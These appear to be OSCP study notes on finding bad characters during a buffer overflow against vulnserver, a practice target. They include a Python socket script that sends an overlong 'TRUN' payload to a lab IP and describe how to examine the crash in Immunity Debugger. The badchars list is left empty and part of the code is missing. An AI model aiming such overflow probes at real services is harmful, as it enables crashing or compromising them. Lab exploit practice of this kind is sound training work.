OSCP Learning Notes - Buffer Overflows(3)

Finding Bad Characters

1. Find the bad charaters in the following website:


2. Write the Python test script using the badchars.

import socket
import sys

badchars = (


shellcode = "A" * 2003 + "B" * 4 + badchars

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    connect = s.connect(('10.0.0.XX',9999))
    s.send(('TRUN /.:/' + shellcode))
    print "check debugger"


3. Start the vulnserver on the Windows OS and Immunity Debugger to monitor this program.

4.Execute the script, the vulnserver is crashed. Then analysts it.


5. After executed the scirpt, the vulnserver crashed.

 6. Right click on the ESP value, and select Follow in Dump.

7. Analyst the ASCII


